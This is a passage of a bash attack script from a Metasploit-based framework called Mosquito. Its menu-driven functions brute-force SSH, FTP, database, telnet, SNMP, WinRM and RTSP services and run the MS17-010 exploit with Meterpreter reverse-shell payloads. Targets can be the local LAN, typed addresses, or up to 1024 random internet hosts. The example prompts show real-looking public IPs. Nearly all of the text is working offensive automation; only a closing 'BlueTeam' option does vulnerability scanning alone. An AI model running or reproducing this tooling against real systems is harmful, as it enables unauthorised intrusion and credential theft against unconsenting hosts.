scan=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect scanning method" --radiolist --column "Pick" --column "Option" FALSE "Scan Local Lan" FALSE "Scan user input rhosts" TRUE "Random search WAN for rhosts" --width 330 --height 200) > /dev/null 2>&1
echo "$RANGE" > ip_range.txt
#
# Sellect the type of scan to use
#
if [ "$scan" = "Scan Local Lan" ]; then
echo "${BlueF}[☠]${white} Scanning Local Lan: $RANGE.0/24"${Reset};
msfconsole -q -x "setg RHOSTS $RANGE.0/24;resource brute_force.rc"
#
# scanning user inputs
#
elif [ "$scan" = "Scan user input rhosts" ]; then
echo "${BlueF}[☠]${white} Scanning User input rhosts"${Reset};
rhost=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Input rhosts separated by blank spaces\nExample: 216.15.177.33 162.246.22.133" --width 450) > /dev/null 2>&1
msfconsole -q -x "setg RHOSTS $rhost;resource brute_force.rc"
#
# scanning ramdom WAN hosts
#
elif [ "$scan" = "Random search WAN for rhosts" ]; then
echo "${BlueF}[☠]${white} Random Search WAN for targets"${Reset};
sealing=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Limmit the number of rhosts to find\nDefault: 250 (max = 1024)" --width 300) > /dev/null 2>&1
max="1024"
rm -f 1024 > /dev/null 2>&1
## Make sure the LIMMIT value did not have exceded the max allowed
if [ $sealing -gt $max ]; then
echo ${RedF}"[x]${white} LIMMIT SET TO HIGTH:${RedF}$sealing${white}, SETTING TO MAX ALLOWED.."${Reset};
sealing="1024"
sleep 1
fi
echo "${BlueF}[☠]${white} Limmit the search to: $sealing hosts"${Reset};
msfconsole -q -x "setg RANDOM_HOSTS true;setg LIMMIT $sealing;resource brute_force.rc"
else
echo "${BlueF}[${RedF}x${BlueF}]${white} None option sellected, aborting 🦟Bzzzz.."${Reset};
sleep 2 && sh_main
fi
}
#
# brute_force ms17_010 (smb) service(s)
#
sh_tree () {
echo "${BlueF}[${YellowF}running${BlueF}]:${white} ms17_010 resource_"${Reset};
sleep 1
IPADDR=`ifconfig $InT3R | egrep -w "inet" | awk {'print $2'}` # grab local ip address
scan=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect scanning method" --radiolist --column "Pick" --column "Option" FALSE "Scan Local Lan" FALSE "Scan user input rhosts" TRUE "Random search WAN for rhosts" --width 330 --height 200) > /dev/null 2>&1
payload=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "\nSellect exploitation Payload:" --radiolist --column "Pick" --column "Option" TRUE "windows/meterpreter/reverse_tcp" FALSE "windows/x64/meterpreter/reverse_tcp" --width 353 --height 195) > /dev/null 2>&1
echo "$RANGE" > ip_range.txt
#
# Sellect the type of scan to use
#
if [ "$scan" = "Scan Local Lan" ]; then
echo "${BlueF}[☠]${white} Scanning Local Lan: $RANGE.0/24"${Reset};
msfconsole -q -x "setg RHOSTS $RANGE.0/24;setg LHOST $IPADDR;setg PAYLOAD $payload;resource ms17_010.rc"
#
# scanning user inputs
#
elif [ "$scan" = "Scan user input rhosts" ]; then
echo "${BlueF}[☠]${white} Scanning User input rhosts"${Reset};
rhost=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Input rhosts separated by blank spaces\nExample: 46.147.255.230 194.58.118.182" --width 450) > /dev/null 2>&1
msfconsole -q -x "setg RHOSTS $rhost;setg LHOST $IPADDR;setg PAYLOAD $payload;resource ms17_010.rc"
#
# scanning ramdom WAN hosts
#
elif [ "$scan" = "Random search WAN for rhosts" ]; then
echo "${BlueF}[☠]${white} Random Search WAN for rhosts"${Reset};
sealing=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Limmit the number of rhosts to find\nDefault: 500 (max = 1024)" --width 300) > /dev/null 2>&1
max="1024"
rm -f 1024 > /dev/null 2>&1
## Make sure the LIMMIT value did not have exceded the max allowed
if [ $sealing -gt $max ]; then
echo ${RedF}"[x]${white} LIMMIT SET TO HIGTH:${RedF}$sealing${white}, SETTING TO MAX ALLOWED.."${Reset};
sealing="1024"
sleep 1
fi
echo "${BlueF}[☠]${white} Limmit the search to: $sealing hosts"${Reset};
msfconsole -q -x "setg RANDOM_HOSTS true;setg LIMMIT $sealing;setg LHOST $IPADDR;setg PAYLOAD $payload;resource ms17_010.rc"
else
echo "${BlueF}[${RedF}x${BlueF}]${white} None option sellected, aborting 🦟Bzzzz.."${Reset};
sleep 2 && sh_main
fi
}
#
# Brute Force ssh service :: done
#
sh_quatro () {
echo "${BlueF}[${YellowF}running${BlueF}]:${white} ssh_brute resource_"${Reset};
sleep 1
scan=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect scanning method" --radiolist --column "Pick" --column "Option" FALSE "Scan Local Lan" FALSE "Scan user input rhosts" TRUE "Random search WAN for rhosts" --width 330 --height 200) > /dev/null 2>&1
echo "$RANGE" > ip_range.txt
#
# Sellect the type of scan to use
#
if [ "$scan" = "Scan Local Lan" ]; then
echo "${BlueF}[☠]${white} Scanning Local Lan: $RANGE.0/24"${Reset};
msfconsole -q -x "setg RHOSTS $RANGE.0/24;resource ssh_brute.rc"
#
# scanning user inputs
#
elif [ "$scan" = "Scan user input rhosts" ]; then
echo "${BlueF}[☠]${white} Scanning User input rhosts"${Reset};
rhost=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Input rhosts separated by blank spaces\nExample: 147.162.198.31 41.225.253.172" --width 450) > /dev/null 2>&1
msfconsole -q -x "setg RHOSTS $rhost;resource ssh_brute.rc"
#
# scanning ramdom WAN hosts
#
elif [ "$scan" = "Random search WAN for rhosts" ]; then
echo "${BlueF}[☠]${white} Random Search WAN for rhosts"${Reset};
sealing=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Limmit the number of rhosts to find\nDefault: 250 (max = 1024)" --width 300) > /dev/null 2>&1
max="1024"
## Make sure the LIMMIT value did not have exceded the max allowed
if [ $sealing -gt $max ]; then
echo ${RedF}"[x]${white} LIMMIT SET TO HIGTH:${RedF}$sealing${white}, SETTING TO MAX ALLOWED.."${Reset};
sealing="1024"
sleep 1
fi
echo "${BlueF}[☠]${white} Limmit the search to: $sealing hosts"${Reset};
msfconsole -q -x "setg RANDOM_HOSTS true;setg LIMMIT $sealing;resource ssh_brute.rc"
else
echo "${BlueF}[${RedF}x${BlueF}]${white} None option sellected, aborting 🦟Bzzzz.."${Reset};
sleep 2 && sh_main
fi
}
#
# brute_force ftp service(s) :: done
#
sh_cinco () {
echo "${BlueF}[${YellowF}running${BlueF}]:${white} ftp_brute resource_"${Reset};
sleep 1
IPADDR=`ifconfig $InT3R | egrep -w "inet" | awk {'print $2'}` # grab local ip address
scan=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect scanning method" --radiolist --column "Pick" --column "Option" FALSE "Scan Local Lan" FALSE "Scan user input rhosts" TRUE "Random search WAN for rhosts" --width 330 --height 200) > /dev/null 2>&1
echo "$RANGE" > ip_range.txt
#
# Sellect the type of scan to use
#
if [ "$scan" = "Scan Local Lan" ]; then
echo "${BlueF}[☠]${white} Scanning Local Lan: $RANGE.0/24"${Reset};
msfconsole -q -x "setg RHOSTS $RANGE.0/24;setg LHOST $IPADDR;resource ftp_brute.rc"
#
# scanning user inputs
#
elif [ "$scan" = "Scan user input rhosts" ]; then
echo "${BlueF}[☠]${white} Scanning User input rhosts"${Reset};
rhost=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Input rhosts separated by blank spaces\nExample: 143.191.125.117 183.17.237.229" --width 450) > /dev/null 2>&1
msfconsole -q -x "setg RHOSTS $rhost;setg LHOST $IPADDR;resource ftp_brute.rc"
#
# scanning ramdom WAN hosts
#
elif [ "$scan" = "Random search WAN for rhosts" ]; then
echo "${BlueF}[☠]${white} Random Search WAN for rhosts"${Reset};
sealing=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Limmit the number of rhosts to find\nDefault: 400 (max = 1024)" --width 300) > /dev/null 2>&1
max="1024"
rm -f 1024 > /dev/null 2>&1
## Make sure the LIMMIT value did not have exceded the max allowed
if [ $sealing -gt $max ]; then
echo ${RedF}"[x]${white} LIMMIT SET TO HIGTH:${RedF}$sealing${white}, SETTING TO MAX ALLOWED.."${Reset};
sealing="1024"
sleep 1
fi
echo "${BlueF}[☠]${white} Limmit the search to: $sealing hosts"${Reset};
msfconsole -q -x "setg RANDOM_HOSTS true;setg LIMMIT $sealing;resource ftp_brute.rc"
else
echo "${BlueF}[${RedF}x${BlueF}]${white} None option sellected, aborting 🦟Bzzzz.."${Reset};
sleep 2 && sh_main
fi
}
#
# brute_force http (CVE) services :: done
#
sh_six () {
echo "${BlueF}[${YellowF}running${BlueF}]:${white} http_CVE resource_"${Reset};
sleep 1
scan=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect scanning method" --radiolist --column "Pick" --column "Option" FALSE "Scan Local Lan" FALSE "Scan user input rhosts" TRUE "Random search WAN for rhosts" --width 330 --height 200) > /dev/null 2>&1
echo "$RANGE" > ip_range.txt
#
# Sellect the type of scan to use
#
if [ "$scan" = "Scan Local Lan" ]; then
echo "${BlueF}[☠]${white} Scanning Local Lan: $RANGE.0/24"${Reset};
msfconsole -q -x "setg RHOSTS $RANGE.0/24;resource http_CVE.rc"
#
# scanning user inputs
#
elif [ "$scan" = "Scan user input rhosts" ]; then
echo "${BlueF}[☠]${white} Scanning User input rhosts"${Reset};
rhost=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Input rhosts separated by blank spaces\nExample: 154.194.198.245 66.199.38.187" --width 450) > /dev/null 2>&1
msfconsole -q -x "setg RHOSTS $rhost;resource http_CVE.rc"
#
# scanning ramdom WAN hosts
#
elif [ "$scan" = "Random search WAN for rhosts" ]; then
echo "${BlueF}[☠]${white} Random Search WAN for rhosts"${Reset};
sealing=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Limmit the number of rhosts to find\nDefault: 250 (max = 1024)" --width 300) > /dev/null 2>&1
max="1024"
rm -f 1024 > /dev/null 2>&1
## Make sure the LIMMIT value did not have exceded the max allowed
if [ $sealing -gt $max ]; then
echo ${RedF}"[x]${white} LIMMIT SET TO HIGTH:${RedF}$sealing${white}, SETTING TO MAX ALLOWED.."${Reset};
sealing="1024"
sleep 1
fi
echo "${BlueF}[☠]${white} Limmit the search to: $sealing hosts"${Reset};
msfconsole -q -x "setg RANDOM_HOSTS true;setg LIMMIT $sealing;resource http_CVE.rc"
else
echo "${BlueF}[${RedF}x${BlueF}]${white} None option sellected, aborting 🦟Bzzzz.."${Reset};
sleep 2 && sh_main
fi
}
#
# Brute Force winrm|wsman|wsmans service(s) :: done
#
sh_seven () {
echo "${BlueF}[${YellowF}running${BlueF}]:${white} winrm_brute resource_"${Reset};
sleep 1
scan=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect scanning method" --radiolist --column "Pick" --column "Option" FALSE "Scan Local Lan" FALSE "Scan user input rhosts" TRUE "Random search WAN for rhosts" --width 330 --height 200) > /dev/null 2>&1
payload=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "\nSellect exploitation Payload:" --radiolist --column "Pick" --column "Option" TRUE "windows/meterpreter/reverse_tcp" FALSE "windows/x64/meterpreter/reverse_tcp" --width 353 --height 195) > /dev/null 2>&1
echo "$RANGE" > ip_range.txt
#
# Sellect the type of scan to use
#
if [ "$scan" = "Scan Local Lan" ]; then
echo "${BlueF}[☠]${white} Scanning Local Lan: $RANGE.0/24"${Reset};
msfconsole -q -x "setg RHOSTS $RANGE.0/24;setg PAYLOAD $payload;resource winrm_brute.rc"
#
# scanning user inputs
#
elif [ "$scan" = "Scan user input rhosts" ]; then
echo "${BlueF}[☠]${white} Scanning User input rhosts"${Reset};
rhost=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Input rhosts separated by blank spaces\nExample: 154.208.147.160 205.65.133.91" --width 450) > /dev/null 2>&1
msfconsole -q -x "setg RHOSTS $rhost;setg PAYLOAD $payload;resource winrm_brute.rc"
#
# scanning ramdom WAN hosts
#
elif [ "$scan" = "Random search WAN for rhosts" ]; then
echo "${BlueF}[☠]${white} Random Search WAN for rhosts"${Reset};
sealing=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Limmit the number of rhosts to find\nDefault: 800 (max = 1024)" --width 300) > /dev/null 2>&1
max="1024"
rm -f 1024 > /dev/null 2>&1
## Make sure the LIMMIT value did not have exceded the max allowed
if [ $sealing -gt $max ]; then
echo ${RedF}"[x]${white} LIMMIT SET TO HIGTH:${RedF}$sealing${white}, SETTING TO MAX ALLOWED.."${Reset};
sealing="1024"
sleep 1
fi
echo "${BlueF}[☠]${white} Limmit the search to: $sealing hosts"${Reset};
msfconsole -q -x "setg RANDOM_HOSTS true;setg LIMMIT $sealing;setg PAYLOAD $payload;resource winrm_brute.rc"
else
echo "${BlueF}[${RedF}x${BlueF}]${white} None option sellected, aborting 🦟Bzzzz.."${Reset};
sleep 2 && sh_main
fi
}
#
# Brute Force mysql service :: done
#
sh_oito () {
echo "${BlueF}[${YellowF}running${BlueF}]:${white} mysql_brute resource_"${Reset};
sleep 1
scan=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect scanning method" --radiolist --column "Pick" --column "Option" FALSE "Scan Local Lan" FALSE "Scan user input rhosts" TRUE "Random search WAN for rhosts" --width 330 --height 200) > /dev/null 2>&1
echo "$RANGE" > ip_range.txt
#
# Sellect the type of scan to use
#
if [ "$scan" = "Scan Local Lan" ]; then
echo "${BlueF}[☠]${white} Scanning Local Lan: $RANGE.0/24"${Reset};
msfconsole -q -x "setg RHOSTS $RANGE.0/24;resource mysql_brute.rc"
#
# scanning user inputs
#
elif [ "$scan" = "Scan user input rhosts" ]; then
echo "${BlueF}[☠]${white} Scanning User input rhosts"${Reset};
rhost=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Input rhosts separated by blank spaces\nExample: 213.171.197.190 46.242.242.249" --width 450) > /dev/null 2>&1
msfconsole -q -x "setg RHOSTS $rhost;resource mysql_brute.rc"
#
# scanning ramdom WAN hosts
#
elif [ "$scan" = "Random search WAN for rhosts" ]; then
echo "${BlueF}[☠]${white} Random Search WAN for rhosts"${Reset};
sealing=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Limmit the number of rhosts to find\nDefault: 500 (max = 1024)" --width 300) > /dev/null 2>&1
max="1024"
rm -f 1024 > /dev/null 2>&1
## Make sure the LIMMIT value did not have exceded the max allowed
if [ $sealing -gt $max ]; then
echo ${RedF}"[x]${white} LIMMIT SET TO HIGTH:${RedF}$sealing${white}, SETTING TO MAX ALLOWED.."${Reset};
sealing="1024"
sleep 1
fi
echo "${BlueF}[☠]${white} Limmit the search to: $sealing hosts"${Reset};
msfconsole -q -x "setg RANDOM_HOSTS true;setg LIMMIT $sealing;resource mysql_brute.rc"
else
echo "${BlueF}[${RedF}x${BlueF}]${white} None option sellected, aborting 🦟Bzzzz.."${Reset};
sleep 2 && sh_main
fi
}
#
# Brute Force mssql service :: done
#
sh_nine () {
echo "${BlueF}[${YellowF}running${BlueF}]:${white} mssql_brute resource_"${Reset};
sleep 1
scan=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect scanning method" --radiolist --column "Pick" --column "Option" FALSE "Scan Local Lan" FALSE "Scan user input rhosts" TRUE "Random search WAN for rhosts" --width 330 --height 200) > /dev/null 2>&1
echo "$RANGE" > ip_range.txt
#
# Sellect the type of scan to use
#
if [ "$scan" = "Scan Local Lan" ]; then
echo "${BlueF}[☠]${white} Scanning Local Lan: $RANGE.0/24"${Reset};
msfconsole -q -x "setg RHOSTS $RANGE.0/24;resource mssql_brute.rc"
#
# scanning user inputs
#
elif [ "$scan" = "Scan user input rhosts" ]; then
echo "${BlueF}[☠]${white} Scanning User input rhosts"${Reset};
rhost=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Input rhosts separated by blank spaces\nExample: 185.99.212.190 180.86.155.12" --width 450) > /dev/null 2>&1
msfconsole -q -x "setg RHOSTS $rhost;resource mssql_brute.rc"
#
# scanning ramdom WAN hosts
#
elif [ "$scan" = "Random search WAN for rhosts" ]; then
echo "${BlueF}[☠]${white} Random Search WAN for rhosts"${Reset};
sealing=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Limmit the number of rhosts to find\nDefault: 500 (max = 1024)" --width 300) > /dev/null 2>&1
max="1024"
rm -f 1024 > /dev/null 2>&1
## Make sure the LIMMIT value did not have exceded the max allowed
if [ $sealing -gt $max ]; then
echo ${RedF}"[x]${white} LIMMIT SET TO HIGTH:${RedF}$sealing${white}, SETTING TO MAX ALLOWED.."${Reset};
sealing="1024"
sleep 1
fi
echo "${BlueF}[☠]${white} Limmit the search to: $sealing hosts"${Reset};
msfconsole -q -x "setg RANDOM_HOSTS true;setg LIMMIT $sealing;resource mssql_brute.rc"
else
echo "${BlueF}[${RedF}x${BlueF}]${white} None option sellected, aborting 🦟Bzzzz.."${Reset};
sleep 2 && sh_main
fi
}
#
# Brute Force telnet service :: done
#
sh_ten () {
echo "${BlueF}[${YellowF}running${BlueF}]:${white} telnet_brute resource_"${Reset};
sleep 1
scan=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect scanning method" --radiolist --column "Pick" --column "Option" FALSE "Scan Local Lan" FALSE "Scan user input rhosts" TRUE "Random search WAN for rhosts" --width 330 --height 200) > /dev/null 2>&1
echo "$RANGE" > ip_range.txt
#
# Sellect the type of scan to use
#
if [ "$scan" = "Scan Local Lan" ]; then
echo "${BlueF}[☠]${white} Scanning Local Lan: $RANGE.0/24"${Reset};
msfconsole -q -x "setg RHOSTS $RANGE.0/24;resource telnet_brute.rc"
#
# scanning user inputs
#
elif [ "$scan" = "Scan user input rhosts" ]; then
echo "${BlueF}[☠]${white} Scanning User input rhosts"${Reset};
rhost=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Input rhosts separated by blank spaces\nExample: 95.38.18.209 201.18.152.50" --width 450) > /dev/null 2>&1
msfconsole -q -x "setg RHOSTS $rhost;resource telnet_brute.rc"
#
# scanning ramdom WAN hosts
#
elif [ "$scan" = "Random search WAN for rhosts" ]; then
echo "${BlueF}[☠]${white} Random Search WAN for rhosts"${Reset};
sealing=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Limmit the number of rhosts to find\nDefault: 600 (max = 1024)" --width 300) > /dev/null 2>&1
max="1024"
rm -f 1024 > /dev/null 2>&1
## Make sure the LIMMIT value did not have exceded the max allowed
if [ $sealing -gt $max ]; then
echo ${RedF}"[x]${white} LIMMIT SET TO HIGTH:${RedF}$sealing${white}, SETTING TO MAX ALLOWED.."${Reset};
sealing="1024"
sleep 1
fi
echo "${BlueF}[☠]${white} Limmit the search to: $sealing hosts"${Reset};
msfconsole -q -x "setg RANDOM_HOSTS true;setg LIMMIT $sealing;resource telnet_brute.rc"
else
echo "${BlueF}[${RedF}x${BlueF}]${white} None option sellected, aborting 🦟Bzzzz.."${Reset};
sleep 2 && sh_main
fi
}
#
# Brute Force RPC service :: done
#
sh_onze () {
echo "${BlueF}[${YellowF}running${BlueF}]:${white} rpc_brute resource_"${Reset};
sleep 1
scan=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect scanning method" --radiolist --column "Pick" --column "Option" FALSE "Scan Local Lan" FALSE "Scan user input rhosts" TRUE "Random search WAN for rhosts" --width 330 --height 200) > /dev/null 2>&1
echo "$RANGE" > ip_range.txt
#
# Sellect the type of scan to use
#
if [ "$scan" = "Scan Local Lan" ]; then
echo "${BlueF}[☠]${white} Scanning Local Lan: $RANGE.0/24"${Reset};
msfconsole -q -x "setg RHOSTS $RANGE.0/24;resource rpc_brute.rc"
#
# scanning user inputs
#
elif [ "$scan" = "Scan user input rhosts" ]; then
echo "${BlueF}[☠]${white} Scanning User input rhosts"${Reset};
rhost=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Input rhosts separated by blank spaces\nExample: 205.72.213.47 199.197.116.190" --width 450) > /dev/null 2>&1
msfconsole -q -x "setg RHOSTS $rhost;resource rpc_brute.rc"
#
# scanning ramdom WAN hosts
#
elif [ "$scan" = "Random search WAN for rhosts" ]; then
echo "${BlueF}[☠]${white} Random Search WAN for rhosts"${Reset};
sealing=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Limmit the number of rhosts to find\nDefault: 800 (max = 1024)" --width 300) > /dev/null 2>&1
max="1024"
rm -f 1024 > /dev/null 2>&1
## Make sure the LIMMIT value did not have exceded the max allowed
if [ $sealing -gt $max ]; then
echo ${RedF}"[x]${white} LIMMIT SET TO HIGTH:${RedF}$sealing${white}, SETTING TO MAX ALLOWED.."${Reset};
sealing="1024"
sleep 1
fi
echo "${BlueF}[☠]${white} Limmit the search to: $sealing hosts"${Reset};
msfconsole -q -x "setg RANDOM_HOSTS true;setg LIMMIT $sealing;resource rpc_brute.rc"
else
echo "${BlueF}[${RedF}x${BlueF}]${white} None option sellected, aborting 🦟Bzzzz.."${Reset};
sleep 2 && sh_main
fi
}
#
# Brute Force snmp service :: done
#
sh_twelve () {
echo "${BlueF}[${YellowF}running${BlueF}]:${white} snmp_brute resource_"${Reset};
sleep 1
scan=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect scanning method" --radiolist --column "Pick" --column "Option" FALSE "Scan Local Lan" FALSE "Scan user input rhosts" TRUE "Random search WAN for rhosts" --width 330 --height 200) > /dev/null 2>&1
echo "$RANGE" > ip_range.txt
#
# Sellect the type of scan to use
#
if [ "$scan" = "Scan Local Lan" ]; then
echo "${BlueF}[☠]${white} Scanning Local Lan: $RANGE.0/24"${Reset};
msfconsole -q -x "setg RHOSTS $RANGE.0/24;resource snmp_brute.rc"
#
# scanning user inputs
#
elif [ "$scan" = "Scan user input rhosts" ]; then
echo "${BlueF}[☠]${white} Scanning User input rhosts"${Reset};
rhost=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Input rhosts separated by blank spaces\nExample: 192.249.87.128 24.24.40.36" --width 450) > /dev/null 2>&1
msfconsole -q -x "setg RHOSTS $rhost;resource snmp_brute.rc"
#
# scanning ramdom WAN hosts
#
elif [ "$scan" = "Random search WAN for rhosts" ]; then
echo "${BlueF}[☠]${white} Random Search WAN for rhosts"${Reset};
sealing=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Limmit the number of rhosts to find\nDefault: 250 (max = 1024)" --width 300) > /dev/null 2>&1
max="1024"
rm -f 1024 > /dev/null 2>&1
## Make sure the LIMMIT value did not have exceded the max allowed
if [ $sealing -gt $max ]; then
echo ${RedF}"[x]${white} LIMMIT SET TO HIGTH:${RedF}$sealing${white}, SETTING TO MAX ALLOWED.."${Reset};
sealing="1024"
sleep 1
fi
echo "${BlueF}[☠]${white} Limmit the search to: $sealing hosts"${Reset};
msfconsole -q -x "setg RANDOM_HOSTS true;setg LIMMIT $sealing;resource snmp_brute.rc"
else
echo "${BlueF}[${RedF}x${BlueF}]${white} None option sellected, aborting 🦟Bzzzz.."${Reset};
sleep 2 && sh_main
fi
}
#
# Brute Force postgres service :: done
#
sh_treze () {
echo "${BlueF}[${YellowF}running${BlueF}]:${white} postgres_brute resource_"${Reset};
sleep 1
scan=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect scanning method" --radiolist --column "Pick" --column "Option" FALSE "Scan Local Lan" FALSE "Scan user input rhosts" TRUE "Random search WAN for rhosts" --width 330 --height 200) > /dev/null 2>&1
echo "$RANGE" > ip_range.txt
#
# Sellect the type of scan to use
#
if [ "$scan" = "Scan Local Lan" ]; then
echo "${BlueF}[☠]${white} Scanning Local Lan: $RANGE.0/24"${Reset};
msfconsole -q -x "setg RHOSTS $RANGE.0/24;resource postgres_brute.rc"
#
# scanning user inputs
#
elif [ "$scan" = "Scan user input rhosts" ]; then
echo "${BlueF}[☠]${white} Scanning User input rhosts"${Reset};
rhost=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Input rhosts separated by blank spaces\nExample: 205.88.183.168 185.99.212.190" --width 450) > /dev/null 2>&1
msfconsole -q -x "setg RHOSTS $rhost;resource postgres_brute.rc"
#
# scanning ramdom WAN hosts
#
elif [ "$scan" = "Random search WAN for rhosts" ]; then
echo "${BlueF}[☠]${white} Random Search WAN for rhosts"${Reset};
sealing=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Limmit the number of rhosts to find\nDefault: 500 (max = 1024)" --width 300) > /dev/null 2>&1
max="1024"
rm -f 1024 > /dev/null 2>&1
## Make sure the LIMMIT value did not have exceded the max allowed
if [ $sealing -gt $max ]; then
echo ${RedF}"[x]${white} LIMMIT SET TO HIGTH:${RedF}$sealing${white}, SETTING TO MAX ALLOWED.."${Reset};
sealing="1024"
sleep 1
fi
echo "${BlueF}[☠]${white} Limmit the search to: $sealing hosts"${Reset};
msfconsole -q -x "setg RANDOM_HOSTS true;setg LIMMIT $sealing;resource postgres_brute.rc"
else
echo "${BlueF}[${RedF}x${BlueF}]${white} None option sellected, aborting 🦟Bzzzz.."${Reset};
sleep 2 && sh_main
fi
}
sh_quatorze () {
echo "${BlueF}[${YellowF}running${BlueF}]:${white} rtsp_url_brute resource_"${Reset};
sleep 1
IPADDR=`ifconfig $InT3R | egrep -w "inet" | awk {'print $2'}` # grab local ip address
scan=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect scanning method" --radiolist --column "Pick" --column "Option" FALSE "Scan Local Lan" FALSE "Scan user input rhosts" TRUE "Random search WAN for rhosts" --width 330 --height 200) > /dev/null 2>&1
echo "$RANGE" > ip_range.txt
#
# Sellect the type of scan to use
#
if [ "$scan" = "Scan Local Lan" ]; then
echo "${BlueF}[☠]${white} Scanning Local Lan: $RANGE.0/24"${Reset};
msfconsole -q -x "setg RHOSTS $RANGE.0/24;setg LHOST $IPADDR;resource rtsp-url-brute.rc"
#
# scanning user inputs
#
elif [ "$scan" = "Scan user input rhosts" ]; then
echo "${BlueF}[☠]${white} Scanning User input rhosts"${Reset};
rhost=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Input rhosts separated by blank spaces\nExample: 201.203.27.251 159.121.101.207" --width 450) > /dev/null 2>&1
msfconsole -q -x "setg RHOSTS $rhost;setg LHOST $IPADDR;resource rtsp-url-brute.rc"
#
# scanning ramdom WAN hosts
#
elif [ "$scan" = "Random search WAN for rhosts" ]; then
echo "${BlueF}[☠]${white} Random Search WAN for rhosts"${Reset};
sealing=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Limmit the number of rhosts to find\nDefault: 700 (max = 1024)" --width 300) > /dev/null 2>&1
max="1024"
rm -f 1024 > /dev/null 2>&1
## Make sure the LIMMIT value did not have exceded the max allowed
if [ $sealing -gt $max ]; then
echo ${RedF}"[x]${white} LIMMIT SET TO HIGTH:${RedF}$sealing${white}, SETTING TO MAX ALLOWED.."${Reset};
sealing="1024"
sleep 1
fi
echo "${BlueF}[☠]${white} Limmit the search to: $sealing hosts"${Reset};
msfconsole -q -x "setg RANDOM_HOSTS true;setg LIMMIT $sealing;setg LHOST $IPADDR;resource rtsp-url-brute.rc"
else
echo "${BlueF}[${RedF}x${BlueF}]${white} None option sellected, aborting 🦟Bzzzz.."${Reset};
sleep 2 && sh_main
fi
}
sh_easter_egg () {
echo "${BlueF}[${YellowF}running${BlueF}]:${white} 🦟easter_egg🦟 ${BlueF}:[${YellowF}BlueTeam${BlueF}]${white}"${Reset};
sleep 1
## Local variable declarations
IPADDR=`ifconfig $InT3R | egrep -w "inet" | awk {'print $2'}` # grab local ip address
scan=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect scanning method" --radiolist --column "Pick" --column "Option" FALSE "Scan Local Lan" TRUE "Scan $IPADDR" --width 330 --height 180) > /dev/null 2>&1
if [ "$scan" = "Scan Local Lan" ]; then
echo "${BlueF}[☠]${white} Scanning Local Lan: $RANGE.0/24🦟"${Reset};
msfconsole -q -x "workspace -a mosquito;db_nmap -sS -v -Pn -T5 -O --top-ports 1000 --open --script=vuln $RANGE.0/24;db_nmap -sV -T5 -Pn --script=freevulnsearch.nse,vulners.nse $RANGE.0/24;hosts -C address,name,os_name,purpose,info;services -c port,proto,state;workspace -d mosquito"
elif [ "$scan" = "Scan $IPADDR" ]; then
echo "${BlueF}[☠]${white} Scanning Local Machine: $IPADDR🦟"${Reset};
msfconsole -q -x "workspace -a mosquito;db_nmap -sS -v -Pn -T5 -O --top-ports 1000 --open --script=vuln $IPADDR;db_nmap -sV -T5 -Pn --script=freevulnsearch.nse,vulners.nse $IPADDR;hosts -C address,name,os_name,purpose,info;services -c port,proto,state;workspace -d mosquito"
else
echo "${BlueF}[${RedF}x${BlueF}]${white} None option sellected, aborting 🦟Bzzzz.."${Reset};
sleep 2 && sh_main
fi
}
###################################################################
# * 🦟 MOSQUITO MAIN MENU 🦟 * #
###################################################################
sh_main () {
rm -f 1024 > /dev/null 2>&1
}
# loop forever
while :
do
clear
echo "---"${BlueF}
cat << !
🦟__________
_______🦟________________________ ___(_) _ /______🦟
__ __ __ \ __ \_ ___/ __ / / / /_ /_ __/ __ \\
🦟_ / / / / / /_/ /(__ )/ /_/ // /_/ /_ / / /_ / /_/ /
/_/ /_/ /_/\____//____/ \__, / \__,_/ /_/ \__/ \____/v:$ver
/_/ 🦟 Author:r00t-3xp10it 🦟
!
echo "" && echo "${BlueF} ${RedF}:${BlueF}Framework Description${RedF}:${BlueF}"${Reset};
cat << !
Mosquito uses metasploit auxiliary modules + nmap nse + resource files
to be able to automate remote brute force tasks over WAN/LAN networks.
'scan Local Lan, scan user inputs (rhosts),Search WAN for random hosts'
!
echo "---"
